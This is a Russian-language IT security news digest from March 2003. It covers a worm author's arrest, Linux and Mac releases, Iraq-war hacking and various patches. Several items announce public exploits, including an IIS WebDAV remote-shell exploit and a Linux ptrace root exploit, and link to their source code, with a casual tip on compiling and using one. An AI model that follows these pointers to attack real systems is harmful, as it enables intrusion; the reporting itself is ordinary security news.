В Швеции полиция обнаружила автора "Ganda" - вируса, который спекулирует на войне в Ираке. Им оказался житель города Хэрнёсанд. Вирусописатель уже признал свою вину. Его имя полиция пока не называет. Автор вируса пока не находится под арестом, однако, в ближайшее время прокуратура планирует предъявить ему соответствующие обвинения. В том случае. Если суд признает вину шведа, ему грозит попасть за решетку. Быть может, даже на четыре года. Учитывая тот факт, что "Ganda" не получила широкого распространения, вряд ли вирусописателя ждет такое серьезное наказание. Ganda" распространяется через интернет в виде файлов, прикрепленных к зараженным письмам. Также "Ganda" внедряет свою компоненту внутрь исполняемых Win32 PE EXE-файлов. Червь активно противодействует антивирусным программам. Червь является приложением Windows (PE EXE-файл), имеет размер 45056 байт написан на языке Assembler. Заголовок и текст выбираются из списка 10 вариантов на шведском языке и 10 вариантов на английском языке в зависимости от текущего установленного языка. Имя вложения: xx.scr (где xx - любые два символа в диапазоне от "a" до "z"). Источник - http://www.viruslist.ru
27/03/2003 09:44 MandrakeSoft выпускает Linux 9.1.
Компания MandrakeSoft выпустила версию 9.1, известную как Bamboo, своего популярного дистрибутива Mandrake Linux для платформы х86, сообщается в пресс-релизе компании. Как утверждают представители компании, этот выпуск является одной из самых развитых и мощных Linux-систем, существующих в данное время на рынке. Mandrake Linux 9.1 предлагает достаточно высокий уровень комфорта для пользователей, упрощенный графический инсталлятор, новую фирменную тему MandrakeGalaxy, качественные шрифты и, конечно, новые среды для рабочего стола KDE 3.1 и GNOME 2.2. Версия ядра Mandrake Linux 9.1 уже доступна для загрузки, а полный программный пакет будет стоить приблизительно от $40 до $200 в зависимости от конфигурации. Версия 9.1 построена на базе ядра 2.4.21 и включает в себя XFree 4.3, KDE 3.1, GNOME 2.2, OpenOffice.org 1.0.2, Mozilla 1.3, Apache 2, и Samba 2.2.7. Кроме того, Mandrake Linux 9.1 имеет множество новых возможностей, в том числе ACPI-поддержку для более лучшего управления питанием ноутбуков, утилита Zeroconf, позволяющая автоматически конфигурировать сетевые настройки на двух компьютерах, работающих под Mandrake 9.1, поддержку файловой системы NTFS, поддержку множества Wi-Fi-устройств, “мягкий” переход c Apache 1.3 на Apache 2. Источник - http://www.cnews.ru
27/03/2003 09:21 Программа тестирования Safari закрыта из-за утечки ПО.
Компания Apple Computer прервала программу, в соответствии с которой ряду разработчиков предоставлялся доступ к последним версиям браузера Safari, после того как несколько предварительных релизов попали к сетевой общественности. Решение Apple последовало за появлением в интернете новой предварительной версии Safari 67. Safari, первый веб-браузер Apple, основан на ПО с открытым исходным кодом, и первая его общедоступная версия была представлена на выставке MacWorld в январе. Apple известна своим стремлением держать информацию о будущих продуктах в тайне и в прошлом судилась на этой почве. В феврале была опубликована вторая общедоступная версия Safari 60. Но отдельным разработчикам компания предоставляет промежуточные версии, рассчитывая получить от них отзывы перед тем, как выпустить на публику следующую версию. В субботу члены программы тестирования Safari Apple Software Seeding получили от макмейкера письмо, информирующее их о следующем решении: «Ввиду появления в интернете копий Safari 67 мы закрываем проект Safari Seed. Нам известно, что большинство из вас не виноваты в утечке информации, и нам очень жаль терять ваши отзывы, а также жаль вашего времени и усилий, потраченных на проект». Письмо размещено на нескольких веб-сайтах для разработчиков и пользователей Мас, и многие участники проекта подтвердили, что они получили его по e-mail. В сеть просочились версии Safari 62, 64 и 67. Apple опубликовала на своем открытом веб-сайте версию 60. Подробности - http://zdnet.com.com/2100-1104-993835.html
26/03/2003 12:07 Мини-HOWTO: Восстановление удаленных файлов с файловой системы Ext2fs в Linux.
В статье Aaron Crane (перевод Дениса Дементьева SWSoft Pte Ltd.) рассказывается о том, как и какими средствами можно восстановить удаленные файлы с файловой системы ext2 (Second Extended File System), применяемой в ОС Linux. Спасибо Руслану Иванову, ака Rend за ссылку. Думается, статья будет небезынтересна администраторам и пользователям ОС Linux. Cтатья - http://www.ruslandh.h1.ru/howto_ru/mini/Ext2fs-Undeletion/index.html
26/03/2003 11:48 Разработан новый, очень быстрый броузер.
Как сообщается на сайте информационного агенства BBC, Аднан Османи, 16-летний подросток из Ирландии, разработал у себя дома браузер Xwebs, который вызывает у пользователей интернета большой интерес. Аднан утверждает, что Xwebs в пять раз быстрее, чем любой другой браузер, однако его заявления подвергаются сомнению в чатах. Впрочем, Аднан говорит, что не обращает на критиков внимания. Дискуссии об этом броузере можно почитать по ссылке, приведённой ниже - там же ответы самого Аднана. Сам он, кстати, говорит, что его броузер в 4-6 раз быстрее остальных. Подробности - http://www.xlab.co.uk/read/299 Страница проекта - http://sourceforge.net/project/showfiles.php?group_id=25147
26/03/2003 11:10 Потоки e-mail обнаруживают организационную структуру предприятия.
Изучая характер обмена электронными сообщениями между сотрудниками компании, легко узнать ее организационную структуру. К такому выводу пришли специалисты Hewlett-Packard. Сотрудники лаборатории НР Джошуа Тайлер (Joshua Tyler), Деннис Уилксон (Dennis Wilkinson) и Бернардо Губерман (Bernardo Huberman) попытались выявить различные формальные и неформальные сообщества внутри организации, основываясь на схеме потоков почтовых сообщений. В ходе исследования, длившегося два месяца, они изучали заголовки писем, которыми обменивались между собой служащие лаборатории со штатом 485 человек, и в общей сложности проанализировали 185 773 сообщения e-mail. Оказалось, что схема потоков e-mail не только точно отражает структуру организации, но и позволяет узнать, кто какой группой руководит. Она помогает идентифицировать и неформальные сообщества, возникающие, когда люди нуждаются в общении вне рамок своих подразделений или работают над совместными проектами. Более того, чтобы обнаружить группы и их лидеров, достаточно проанализировать данные в течение всего нескольких часов. «Мощь этого метода выявления групп и лидеров в его автоматизме, — говорится в отчете. — Чтобы определить фактические сообщества, не требуется ничего, кроме данных из полей “to” и “from” журнала регистрации e-mail». Подробнее - http://zdnet.com.com/2100-1104-993897.html
26/03/2003 10:33 Microsoft борется со спамом по-своему.
Microsoft придумала, как победить спам. Или хотя бы частично уменьшить его количество в почтовых ящиках. Теперь пользователи почтовой службы MSN Hotmail могут отсылать не более сотни писем в день. В общем-то, вполне достаточно для того, кто не является спамером. По последним данным количество спама в интернете в среднем составляет от 15 до 20% всего почтового трафика. Больше всего от спамеров страдают компании и частные лица, ведущие активную деятельность в интернете - зачастую объем навязчивой рекламы и другой нежелательной корреспонденции в их почтовых ящиках превосходит количество полезной информации. 'Чтобы ограничить их активность, компания Microsoft ввела ограничение, позволяющее бесплатным пользователям отсылать не более 100 писем в сутки' - сказала ведущий продакт-менеджер MSN Лиза Гури, добавив, что новое правило не должно ущемить права большинства пользователей. В MSN называют данный шаг вынужденным. По оценкам компании, за последние полтора года число спамерских сообщений, отсылаемых через Hotmail, выросло на 500 процентов. Для платных пользователей Hotmail ограничений нет. Источник - http://www.viruslist.ru
26/03/2003 10:06 Интернет через розетку становится реальностью.
В конце февраля 2003 года в Зеленограде столичные энергетики провели ряд успешных испытаний новой технологии, которая позволит московским пользователям Сети выходить в интернет через обычную электрическую розетку. Технология высокоскоростной сети, качество передачи данных по которой сравнимо и даже превосходит по ряду параметров ныне существующие выделенные линии, была испытана на базе 19-го района «Московских кабельных сетей» в Зеленограде. Самое большое преимущество новшества состоит в том, что оно не требует создания дополнительной сети. Электропроводка, как известно, существует в любом здании и помещении. Доступ к информационным и телекоммуникационным сетям будет осуществляться с помощью специальных устройств, трансформирующих сигнал. При этом, как показали первые тесты, передача данных «через розетку» не будет влиять на общую систему энергоснабжения — так называемые «силовой» и «информационный» потоки проходят независимо друг от друга. Подробности - http://www.webplanet.ru/news/communications/2003/3/26/internet_electric_3.html
26/03/2003 09:44 При МГУ планируется создать Институт информационной безопасности.
Ректор Московского государственного университета им.М.В.Ломоносова академик Виктор Садовничий намерен к 2005 году создать при университете Институт информационной безопасности. О своих планах он сообщил на пресс-конференции, прошедшей во вторник в столице. По словам ректора, работу по созданию института планируется провести в ближайшие два года, к 250-летию МГУ. Ожидается, что институт будет готовить специалистов по информационной безопасности, в частности, по борьбе с хакерами. Источник - http://www.securitylab.ru
26/03/2003 09:35 Хакеры свалили "Аль-Джазиру".
Как сообщается на сайте New Scientist, в понедельник утром Вэб-сайт информационного агенства "Аль-Джазира" (www.aljazeera.net) бфл недоступен в Интернет. Это случилось после показа этим информационным агенством видеоматериалов, в которых были показаны пленные американские военнослужащие. В 12.00 по Гринвичу работоспособность сервера была восстановлена. Как сказал один из сотрудников "Аль-Джазиры", сбой был вызван деятельностью несутановленных хакеров. Судя по всему, имела место атака типа распределённой DoS (DDoS). Подробности - http://www.newscientist.com/news/news.jsp?id=ns99993537
25/03/2003 21:34 Эксплоит уязвимости WebDAV в IIS для Linux.
Как и следовало ожидать, исходник эксплоита, использующего уязвимость в компоненте WebDAV сервера IIS в ОС Windows2000 для ОС Linux, не заставил себя долго ждать. Написан Roman Medina из RoMaNSoFt ReSe@rch Labs. Прежде, чем компилировать и применять его - настоятельно рекомендуем прочитать в комментарии вступление, написанное автором (дабы потом не задавать во семвозможных форумах глупые вопросы ;) ). Впрочем, этот совет применим ко многим эксплоитам. Эксплоит запускает удалённый шелл на уязвимом сервере на порту, который задаётся в аргументах эксплоита. После выхода из шелла ("exit") IIS на сервере тоже "умирает" (на что следует обратить внимание). Исходник - http://www.rs-labs.com/exploitsntools/rs_iis.c
25/03/2003 14:28 Эксплоит локальной уязвимости в ядрах Linux.
На сайте security.nnov.ru выложен исходник эксплоита локальной уязвимости в ядрах Linux, позволяющий (ввиду уязвимости в ptrace/kmod) получить права суперпользователя (root) на сервере. Написан поляком Wojciech Purczynski. Эксплоит - http://www.security.nnov.ru/files/linuxptraceex.c
25/03/2003 13:22 Нарушена работа единственного иракского провайдера.
Как сообщает cnews.ru, перестал работать единственный иракский интернет-провайдер Uruklink (www.uruklink.net). Сайты Министерства Здравоохранения Ирака (www.uruklink.net/health), Министерства Культуры и Информации (www.uruklink.net/iraqinfo), МИД (www.uruklink.net/mofa), и других государственных учреждений, которые были размещены на серверах Uruklink, также стали недоступными. Судя по всему, деятельность иракского провайдера была прервана относительно недавно, так как уже после интенсивных ракетно-бомбовых ударов журналисты из австралийской газеты Sydney Morning Herald проверяли работоспособность иракского провайдера. Тогда сайты работали, хотя веб-страницы загружались очень медленно, видимо, из-за наплыва огромного количества посетителей. Сайт иракской газеты Babil (www.babilonline.net), выпускавший новости из Ирака на арабском языке, также перестал отвечать на запросы. Удивительно, но сайт иракского телевидения продолжает функционировать. Он доступен по своему IP-адресу (62.145.94.28). Сервер, на котором размещен этот сайт, находится за пределами Ирака. Источник - http://www.smh.com.au
25/03/2003 13:04 Война в Ираке привела к взрывному росту хакерской активности.
Как сообщает compulenta.ru, война в Ираке послужила поводом для значительной активизации хакеров всех мастей. Одной из первых ласточек стал взлом кубинского сайта бразильскими хакерами, разместившими на нем слова NO WAR F*** BUSH F*** USA. Этот взлом произошел еще до начала военной операции США и Великобритании. С началом вооруженного конфликта в Персидском заливе ситуация резко осложнилась. В период с 17 по 23 марта число взломов выросло примерно вдвое, по сравнению с более ранними периодами. Сообщения о взломах начали приходить со всего мира. Среди наиболее значительных взломов стоит отметить подмену страниц одного из сайтов ВМФ США, произведенную хакером по кличке Apocalypse. Большинство же атак проводились на сайты, содержащие уязвимости. К примеру, от деятельности "хактивистов" пострадал сайт британского отделения японской компании NEC. Большинство взломов направлено, конечно же, против империалистической политики США. Среди подобных атак можно выделить три типа. Первый тип представляют взломы, произведенные исламскими хакерскими группами. В них нападкам подвергаются не только США, но и другие враги арабского мира, такие как Израиль. Другие взломы не имеют отношения к исламскому экстремизму, но жестко критикуют США и их политику, сравнивая президента Буша с Гитлером. Попадаются и сатирические протесты, к примеру, на этом скриншоте представлена нарисованная хакерами афиша к фильму "Властелин нефти" по мотивам творчества Толкина, где в роли Фродо выступает Саддам Хуссейн, в роли Гендальфа - Осама бен Ладен, Джордж Буш - в роли Сарумана, а госсекретарь Колин Пауэлл и министр обороны Дональд Рамсфельд "играют" орков. Подробности и скриншоты - http://www.compulenta.ru/2003/3/25/38491/
25/03/2003 12:39 Приём статей для DEF CON 11.
Dark Tangent, один из организаторов крупнейшей (и известнейшей) хакерской конференции DEF CON объявил о начале приёма статей на DEF CON 11, которая состоится 1-3 августа 2003 г. в Лас-Вегасе. Приём заявок и статей будет закончен 15 июня. Все желающие могут, заполнив соответствующую форму, послать тезисы своей статьи, если таковая имеется. Также в анонсе было объявлено о доступности видео-материалов выступлений предыдущей, десятой, конференции DEF CON, состоявшейся в прошлом году. Подробности - http://www.defcon.org/html/defcon-11/defcon-11-cfp.html
25/03/2003 10:51 10 лет Red Hat!
Как написано на сайте Red Hat, исполнилось 10 лет фирме, которая выпускает один из самых попуялрных дистрибутивов операционной системы Linux. В связи с чем на сайте компании выложена история америкнаской компании (этапы славного пути). Основал команию в 1993 г. Bob Young под названием ACC Corporation, которая изначально занималась продажей Linux и UNIX программных продуктов и книг, а также издавала журнал под названием "New York UNIX". В октябре 1994 г. Марком Эвингом был опубликован первый самостоятельный релиз Red Hat Linux 1.0 под названием Halloween. В 1995 г. Боб Янг купил бизнес у Марка и соединив с финансами ACC Corporation, назвал новую фирму Red Hat Software. В этом же году был выпущен дистрибутив Red Hat 2.0, в котором был впервые представлен новый менеджер пакетов RPM, завоевавший в дальнейшем огромную популярность. В 1996 г. были открыты офисы в Северной Каролине со штаб-квартирой в г. Durham. Также хотелось бы отметить, что в юбилейный для себя год компания объявила о выпуске 31 марта сего года нового версии дистрибутива - Red Hat Linux 9, что наводит на мысль (в свете относительно недавнего выхода 8-й версии) о желании выпуска в этом же году Red Hat Linux 10. ;) Подробности - http://www.redhat.com/mktg/rh10year/
25/03/2003 09:22 Новая версия MacOS X будет представлена в июне.
Компания Apple объявила о сроке проведения первой демострации новой операционной системы MacOS X Panther, которая должна прийти на смену MacOS X 10.2 Jaguar, появившейся в августе прошлого года. Первая официальная демонстрация Panther состоится на Всемирной конференции Apple для разработчиков (WWDC), которая пройдет в период с 23 по 27 июня в Сан-Франциско. Никаких подробностей о новой версии MacOS Apple пока не сообщает. Однако многие журналисты и поклонники Apple, что изменения в ней будут не менее значительными, чем в Jaguar. Напомним, что в MacOS X 10.2 появилось множество нововведений, таких как программа iChat, поддержка технологии Rendezvous и многое другое. В результате, Jaguar стала самой продаваемой ОС в истории Apple. Дата выхода Panther на рынок также пока неизвестна. Проводя аналогию с Jaguar, можно предположить, что новая ОС появится в продаже через три-четыре месяца после презентации на WWDC. Источник - http://www.apple.com/
25/03/2003 08:41 Статья "Меняем баннеры некоторых демонов".
Благодаря Руслану Иванову, ака Rend, наткнулся на довольно любопытную статью, которая описывает способы изменения баннеров некоторых сетевых демонов. как известно, в процессе подготовки взлома, основной задачей хакера является сбор предварительных данных об объекте атаки (своего рода, разведка), в процессе которой собираются данные о типе и версии применяемых служб (FTP-сервер, почтовый сервер, SSH-демон, POP3-сервер и т.д.). Чтобы затруднить жизнь взломщику или повести его по ложному пути как раз и применяются методы изменения баннеров, выдаваемых сетевыми демонами (а также сокрытие этих баннеров). В статье, автор которой к сожалению неизвестен (в качестве источника приводится сервер www.freebsd.bip.ru), описаны методы, при помощи которых можно изменить баннеры таких демонов. Думаю, будет небезынтересна начинающим СИСАДМИНам. Статья - http://freeunix.unicor.ru/content.php?page=Безопасность&id=115
25/03/2003 08:03 Создание системы сетевого мониторинга на основе Nagios.
Как известно, с увеличением количества подконтрольных сетей перед каждым администратором встает вопрос о создании единой системы мониторинга серверов и сервисов. Внедрение такой системы позволит повысить производительность работы компании и уменьшить время простоя оборудования. Несмотря на свои неоспоримые достоинства, коммерческие системы вроде Solar Winds, 3COM Network Superviser и HP OpenView, обычно отпугивают довольно высокими ценами. Однако, существуют бесплатные системы мониторинга сетей. К ним относятся: Big Brother, Angel Network Monitor, HiWayS, MARS, Autostatus, NocMonitor, RITW, Nagios. К основным задачам систем мониторинга можно отнести - оповещение администратора с помощью электронной почты, пейджера или sms сообщений, если с наблюдаемыми объектами случаются какие-либо неприятности. Также оповещения должны отсылаться, когда состояние объекта возвращается в норму. В статье, опубликованной Андреем Бешковым на сайте opennet.ru, описан процесс установки, конфигурирования и настройки системы сетевого мониторинга на базе бесплатной системы Nagios. Процесс создания системы рассмотрен на примере ОС FreeBSD 4.5. Автор был бы рад получить отклики и замечания на опубликованную статью. Cтатья - http://www.onix.opennet.ru/monitoring/nagios.html
24/03/2003 22:15 Эксплоиты для использования уязвимости WebDav.
Для широкой общественности выложен эксплоит, использующий уязвимость в службе WebDav сервера IIS 5.0 (мы сообщали об этой уязвимости ранее). Автор эксплоита - Рафаэль Нуньес из Венесуэлы. В письме с исходным кодом эксплоита автор указывает на то, что опубликованный им ранее эксплоит iis_txt.c не имеет никакого отношения к уязвимости в WebDav, а относится к обнаруженной ранее уязвимости iistart.asp. Исходник предназначен для ОС Windows, в коей, собственно, он и может быть скомпилирован. Для заинтересованных приводим ссылку и на эксплоит iis_txt.c (тоже для платформы Windows). Эксплоит - http://www.securityfocus.com/archive/1/316088 iis_txt.c - http://rafa.h0stile.net/iis_txt.c
24/03/2003 16:00 Новый патч для Windows 2000 может привести к серьезным сбоям.
Один из последних патчей, выпущенных корпорацией Microsoft для исправления ошибок в ОС Windows 2000, может в редких случаях приводить к краху системы. К счастью, некорректная работа заплатки наблюдается на очень малом числе систем. "Синий экран" появляется при установке патча на ОС Windows 2000 SP2, в которой установлены некоторые из предшествующих заплаток, полученных напрямую от службы технической поддержки Microsoft (Microsoft Product Support Services). Число таких систем, по оценке эксперта компании TruSecure и редактора рассылки NTBugtraq Расса Купера, составляет менее 1%. Всем пострадавшим от ошибки рекомендуется воспользоваться консолью восстановления Windows 2000 и вернуть систему в состояние, предшествовавшее установке патча. Затем необходимо установить пакет обновлений Service Pack 3, и лишь поверх него устанавливать новую заплатку. В системах с установленным SP3 "синий экран" не возникает. Причина появления ошибки, по мнению Купера, заключается в том, что в Microsoft недостаточно полно оттестировали новую заплатку, не проверив ее на совместимость со всеми предшествующими обновлениями. Однако у Microsoft были на то объективные причины - первый случай использвания дыры был зафиксирован еще до выпуска исправления, причем взломан был один из серверов Министерства обороны США. Поэтому в Microsoft решили поспешить с выпуском патча в ущерб его отладке. Источник - http://www.compulenta.ru
24/03/2003 13:48 Выход QNX 6.2.1 NC.
Как сообщает SHuRuP с nixp.ru, на сайте OpenQNX появилось сообщение о выходе новой некоммерческой версии операционной системы QNX - QNX 6.2.1 Non-Commercial. Сайт проекта - http://www.openqnx.com/
24/03/2003 12:54 Патч для stunnel.
Brian Hatch сообщил от имени разработчиков проекта stunnel о доступности патчей для версий 3.х и 4.х. Stunnel - приложение, служащее подобием шлюза для организации SSL-туннеля при взаимодействии клиента с сервером через общедоступные сети (Интернет). При установлении соединения через туннель происходит обмен RSA-ключами. David Brumley и Dan Boneh описали новый вид атаки на криптозащищённые каналы под названием RSA timing attack (мы сообщали об этом в предыдущих выпусках новостей), при помощи которой (послав, правда, достаточно большое кличество пакетов) можно вычислить используемые RSA-ключи. Для устранения этой уязвимости и были выпущены патчи для stunnel. После применения патчей требуется перекомпиляция stunnel. Патч для версии 3.х - http://www.stunnel.org/patches/desc/blinding-3.x_bri.html Патч для версии 4.x - http://www.stunnel.org/patches/desc/blinding-4.x_bri.html
24/03/2003 11:23 Уязвимость в Edonkey2000 и Overnet.
Как сообщает Auriemma Luigi из PivX Solutions, обнаружена возможность повесить компьютер с установленными клиентам пиринговой сети Edonkey2000 и Overnet. Пиринговые сети (или p2p-сети) используются в Интернет для обмена файлами. В этих сетях используется протокол, называемый Edonkey-протоколом. Помимо взаимного разделения файлов протокол также обеспечивает возможность осуществления чата (обмена сообщенияи) между двумя узлами пиринговой сети. Уязвимость заключается в том, что количество сообщений при подобном чате не ограничивается. Послав очень большое количество сообщений (содержащих разные хэш-строки для разных сообщений) можно вызвать ситуацию, когда все ресурсы компьютера-жертвы будут исчерпаны. Как говорит сам автор, в процессе тестирования им было обнаружено, что для исчерпания ресурсов компьютера Pentium II-448 Mhz с 500 Mb RAM достаточно было посылки 500 сообщений. Уявзимость обнаружена в клиентах Edonkey2000 и Overnet версий 0.45. Рекомендуется обновить свои клиенты до версии 0.46. Выпущен эксплоит. Эксплоит - http://www.pivx.com/luigi/poc/eddos.zip
24/03/2003 10:38 Недельный отчет о вирусах Panda Software.
Опубликован недельный отчёт о вирусной активности от компании Panda Software. В мире компьютерных вирусов прошедшая неделя ознаменовалась появлением вирусов Axatak, Ganda.A, Bibrog.C и Lentin.Q. Axatak использует классические способы распространения червей (электронная почта, файлы из сети Интернет, данные, передаваемые по протоколу FTP и т.п.). После заражения компьютера червь перехватывает пароли для доступа к определенным ресурсам и отправляет их своему создателю. Кроме того, Axatak способен действовать как троянец, предоставляющий возможность получения удаленного доступа к компьютеру, открывая порты 8850 и 8851. Это позволяет злоумышленникам проникать в зараженную систему, получать любую информацию, а также выполнять некоторые действия на зараженном компьютере, например, отправлять файлы или открывать/закрывать лоток устройства для чтения компакт-дисков. Наконец, каждые пять минут Axatak пытается сохранить свою копию на дискету. С описанием остальных вирусов заинтересованные могут ознакомиться по ссылке, приведённой ниже. Подробнее - http://www.viruslab.ru/press/index.php?go=show&num=125
24/03/2003 10:04 Office 2003 создает проблемы антивирусным компаниям.
Последняя тестовая версия Microsoft Office 2003 может вызвать проблемы у антивирусных компаний, так как поддерживаемый ею формат на основе XML создает дополнительные трудности для сканирующего ПО. Проблема связана с макросами, встроенными в документы бета-версии Office 2003. При сохранении файла в формате XML макрос может оказаться в любом его месте, а это означает, что сканерам придется обследовать все содержимое файла, а не только ту его часть, где обычно хранятся макросы. Антивирусная индустрия предложила простое решение этой проблемы, но Microsoft так и не ввела соответствующих изменений. На просьбу прокомментировать ситуацию Microsoft пока не ответила. Антивирусные компании хотят, чтобы в файлах содержался заголовок с информацией о том, где искать макросы. Кроме того, чтобы гарантировать, что вирусы не проникнут сквозь щели, приложения комплекса Office должны выполнять лишь те макросы, которые указаны в заголовке. Подробности - http://www.zdnet.ru/?ID=297962
24/03/2003 09:30 Серверная версия Longhorn, все-таки, выйдет.
Информация о том, что новая версия ОС Windows под кодовым названием Longhorn будет исключительно клиентской системой, не подтверждается. Как сообщает издание Computerworld со ссылкой на главу подразделения операционных систем Microsoft Брайана Валентайна, заявления ряда представителей Microsoft о том, что серверная версия Longhorn не появится в продаже, были несколько преждевременными. Напомним, что формальным поводом для заявлений об отмене серверной версии Longhorn стали опасения в том, что интервал между выпуском Windows Server 2003 и Longhorn Server будет слишком коротким, а это может создать на рынке ненужную путаницу. Однако, по словам Валентайна, все оказалось далеко не так просто. В Longhorn появятся огромное число нововведений, как внешних, так и внутренних, и их поддержку, так или иначе, придется внедрять и на серверной стороне. Каким образом эта поддержка будет реализована, пока не знают даже в Microsoft. Валентайн заявил, что в компании поступят таким образом, чтобы обеспечить максимальное удобство для клиентов. Поэтому вполне возможно, что с выходом клиентской версии Longhorn появится и серверный вариант этой ОС. С другой стороны, ничто не мешает Microsoft реализовать необходимые изменения в виде обновления для ОС Windows Server 2003, которая появится на рынке в апреле нынешнего года. Косвенно о возможности выхода серверного варианта Longhorn свидетельствует и то, что, по заявлению Валентайна, эта ОС увидит свет не ранее 2005 г. Источник - http://www.compulenta.ru
24/03/2003 09:22 Статья о RSBAC.
В форуме на нашем сайте была затронута тема защиты файлов одного администратора от другого администратора в ОС Windows 2000. Необходимо отметить, что подобная проблемы в ОС Linux была решена довольно давно при помощи проекта RSBAC - Rule Set Based Access Control (управление доступом на основе установленных правил). Суть проекта сводится к следующему. Вместо всесильного суперпользователя (root) вводятся 2 человека: администратор системы и администратор безопасности (офицер безопасности в терминах RSBAC). Оба не могут влиять друг на друга и даже будут конкурировать за власть в системе. Администратор может по-прежнему управлять системой в целом, производить настройки, заводить и удалять пользователей, ограничивать использование пользователями системных ресурсов. Офицер безопасности будет ограничивать всех пользователей (включая администратора) в доступе к тем или иным данным, в том числе и системным. Например, администратор, в отличие от офицера, сможет заводить пользователей, но не сможет вручную редактировать файлы /etc/passwd и /etc/shadow, если не разрешит офицер. Описанию основ RSBAC и посвящена статья "RSBAC для начинающих", написанная Станиславом Иевлевым с сайта LRN (linux.ru.net). Cтатья - http://www.linuxcenter.ru:8081/lib/index.phtml?path=/security/rsbac9.phtml
23/03/2003 16:45 Статья "Understanding heap overflow exploits".
На сайте NEWORDER опубликована интереснейшая статья некоего господина под ником nebunu посвящённая описанию технологии переполнения кучи (heap). Как пишет сам автор, технология перезаписи указателя функции (function pointer) позволяющая выполнить шелл-код на стэке или на куче, использовалась в последнее время во многих недавно вышедших эксплоитах: 7350fun, Apache-scalp, openssl-too-open, sshut-up-theo, sshchan. В написанной статье автор поставил перед собой цель - описать, каким же образом и при каких условиях происходит перезапись указателя функции и, как следствие, переполнение кучи (или буфера в стэке). Статья - http://neworder.box.sk/newsread.php?newsid=7394
23/03/2003 15:02 Обновление для Internet Explorer.
Microsoft выпущено очередное обновление для IE 5.01 (SP1, SP3), 6.0, 6.0 SP1 под кодовым индексом Q331596. Устраняет ошибку, которая возникает в IE при просмотре сжатого (gzip) файла Microsoft Excel. Содержимое файла при этом обрезается и просмотр его становится невозможным. Однако, если Вы созраните файл на диске, а затем откроете при помощи Microsoft Excel - файл будет содержать корректную информацию. Необходимо признать, что выпущён патч только для английских версий IE (содержит исправленную версию URLmon.dll) Обновление - http://download.microsoft.com/download/.../q331596.exe
23/03/2003 14:34 Настраиваем qmail с виртуальными ящиками и защитой от вирусов и спама.
На сайте Opennet.ru опубликована статья Александра Афанасенкова, посвящённая настройке связки Qmail + VpopMail + DrWeb + SpamAssassin. Будет крайне полезна администраторам почтовых серверов под управлением неплохого MTA Qmail. Cтатья - http://www.opennet.ru/base/net/qmail_antispam.txt.html
23/03/2003 13:38 Статья "В бой идут одни "старики".
Хотелось бы отметить на сайте того же проекта ещё одну очень интересную статью под названием "В бой идут одни "старики". Автор статьи - Александр Куприн. Посвящена созданию сети из маломощных компьютеров для работы с современными приложениями, используя проект LTSP. Вот, собственно, слова самого автора из вступления: "Знаете ли вы, что можно комфортно работать в Office XP под Windows 2000 на 486 компьютере? Слушать музыку или смотреть фильмы? Предпочитаете не покупать для этого дорогие и мощные компьютеры? Хотите дать "вторую жизнь" парку морально устаревшей техники? Читайте дальше! Заманчиво, правда?" Это цитата с сайта проекта LTSP.RU Конечно, я мог бы придумать для вступления что-то от себя, но, думаю, этот абзац отражает как нельзя более точно то, что я хотел бы сказать (разве что заменяя слова Windows на Linux, Office XP на OpenOffice). Поэтому если вас это заинтересовало, читайте дальше! Проект LTSP (Linux Terminal Server Project) существует вот уже три года (с июля 1999-го). Суть проекта заключается в использовании преимуществ терминал-серверной технологии, что приводит к существенному снижению затрат на приобретение и обслуживание аппаратного обеспечения, централизованному управлению (т.к. прикладное ПО устанавливается только на сервере) и, как следствие, упрощению администрирования системы. Кроме этого LTSP распространяется под лицензией GNU GPL и вы вправе использовать его не платя при этом ни копейки". Статья - http://www.linuxrsp.ru/artic/ltsp.html
23/03/2003 13:21 Cтатья "От включения питания до приглашения Bash".
На сайте проекта LinusRSP опубликован перевод оригинальной статьи Greg O'Keefe (перевод выполнен WintiX) под названием "From PowerUp to Bash Prompt HOWTO". Это краткое описание того, что происходит в системе Linux с момента, когда вы включаете питание до момента входа в систему и получения командной строки bash. Понимание этих вещей помогает в решении проблем и настройке системы. Рекомендуется к ознакомлению как начинающим, так и продвинутым пользователям Linux. Cтатья - http://www.linuxrsp.ru/docs/howto/From-PowerUp-to-Bash-Prompt-HOWTO.html
23/03/2003 12:59 Lindows стимулирует переход на альтернативную ОС.
Lindows.com представила вариант выгодного соглашения, которое должно сделать более привлекательной его операционную систему и стимулировать переход к ней от Windows сборщиков ПК. По словам представителей компании, новая программа RevShare рассчитана на мелких и средних дилеров компьютерных систем и позволяет увеличить их постпродажные доходы даже после поставки системы. Lindows объяснил, что инициатива будет основана на процентном доходе от дополнительной стоимости приложений, которые пользователи будут приобретать после покупки самого ПК. Так, если пользователь приобретает услуги или обновления от Lindows, поставщик, продавший компьютерную систему с этим ПО, получает до 20% от размера сделки. По мнению руководства компании, большинство аппаратного обеспечения для домашних и деловых ПК поставляют гораздо менее масштабные, нежели Dell и IBM, сборщики компьютерных систем. Партнерская программа компании RevShare облегчит получение целенаправленной прибыли от продаж ПО и услуг таким участникам рынка. По подсчетам специалистов, мелкие сборщики ПК составляют более 60% от общего рынка продаж. Источник - http://www.cnews.ru
23/03/2003 12:33 История Windows в картинках.
Как сообщается на сайте internet.ru, Коллекция creamhackered составила 16 веб – страниц, где пользователи могут наблюдать за ходом эволюции ОС Windows, начиная с первой версии Windows 1.0, выпущенной в 1985 году и заканчивая предстоящим запуском Windows Server 2003. К каждому скриншоту автор дает собственные комментарии и кратко рассказывает об истории создания продукта. "Я надеюсь, что эта статья даст каждому читателю настоящую картину истории развития компании Microsoft и ее продуктов, которые совершили инновационную революцию, полностью изменив нашу жизнь и бизнес. Более 90% пользователей ПК используют программное обеспечение Microsoft. Благодаря ОС Windows Microsoft приобрела статус мировой компании и теперь входит в топ самых успешных корпораций планеты, оставив позади промышленные и сырьевые компании. Инновационный путь развития бизнеса стал феноменом наших дней», - обращается автор к своим читателям. Для навигации по описаниям - пользуйтесь навигацией внизу страницы. От себя добавим, что было довольно интересно вспомнить как выглядел Windows 3.0 (первая из увиденных). :) История - http://www.neowin.net/articles.php?action=more&id=56&perpage=1&pagenum=6
23/03/2003 11:41 FTP для смартофона.
